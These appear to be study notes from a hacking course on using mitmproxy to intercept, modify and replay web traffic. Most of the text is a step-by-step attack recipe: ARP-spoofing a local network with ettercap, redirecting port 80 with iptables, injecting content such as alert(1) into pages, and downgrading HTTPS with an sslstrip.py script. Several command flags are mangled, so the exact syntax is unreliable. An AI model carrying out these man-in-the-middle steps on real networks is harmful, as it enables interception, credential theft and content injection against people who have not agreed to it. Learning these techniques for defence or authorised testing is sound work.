• Used to analyze, modify, and replay packet flows
  • it is a more low level program

How to install

  • cd /opt
  • https://github.com/mitmproxy/mitmproxy/releases
  • extract to a new folder named mitmproxy
    • 3 files will show up
    • mitmdump - command line version of the program
    • mitmproxy - main interactive command tool
    • mitmweb - web interface that allows you to monitor traffic

to see the traffic flow when a user connects to a website

  • cd /opt/mitmproxy
  • ./mitmweb
  • navigate to web url
  • set firefox proxy to
  • The main search box can be used to filter packets
    • ie. -a .js >> this will only show you javascript files
    • ie -m POST >> this will only show you post requests
  • The highlight option will only highlight what we want and not filter it

How to edit and modify packets

  • cd /opt/mitmproxy
  • ./mitmweb
  • navigate to web url
  • set firefox proxy to
  • The intercept option is used to tell mitmproxy to only intercept those packets
    • This means that request is held by us and not allowed to flow through
  • you can then use the ui to modify the response and play it
    • the video added a alert(1) to the bing.com response

Another example but this time using ettercap and mitmproxy

  • ettercap -Tq -M arp:remote -i wlan0 -S / /
    • This command will make us the attacker the mitm
  • iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080
    • This command tells out computer to redirect port 80 to port 8080 where we are running mitmproxy
  • cd /opt/mitmproxy
  • ./mitmweb —transparent
  • When you are done
    • quit mitmweb
    • iptables -t nat —flush

To automate the steps tested using mitmweb

  • Run ettercap
  • update iptables
  • ./mitmdump —transparent —modify-body :~s:””:”
    • :filter:text to replace:txt that will be injected
  • When you are done
    • quit mitmweb
    • iptables -t nat — flush

    How to use Python to interact with mitmproxy

  • pip install mitmproxy
    • import mitmproxy
  • write your python script
  • ./mitmdump -s /root/test.py —transparent


The biggest issue with the techniques we learned about mitmproxy is that they will only work with http websites. They will not work with https websites **

  • https data is encrypted usinf ssl
  • data can not be read or modified
  • sslstrip cannot be used since mitmproxy cannot work with another transparent proxy
    • sslstrip is used to downgrade a webpage from https to http

What is the solution?

  • use a mitmproxy script to bypass https
  • there is a script named sslstrip.py that will downgrade a website from https to http

How do we perform the attack on https sites?

  • ettercap -Tq -M arp:remote -i wlan0 -S / /
  • ./mitmdump -s /root/sslstrip.py -s /root/test.py —mode transparent
    • note you can run multiple scripts at the same time
  • iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080
  • When you are done
    • quit ettercap
    • quit mitmdump
    • iptables -t nat — flush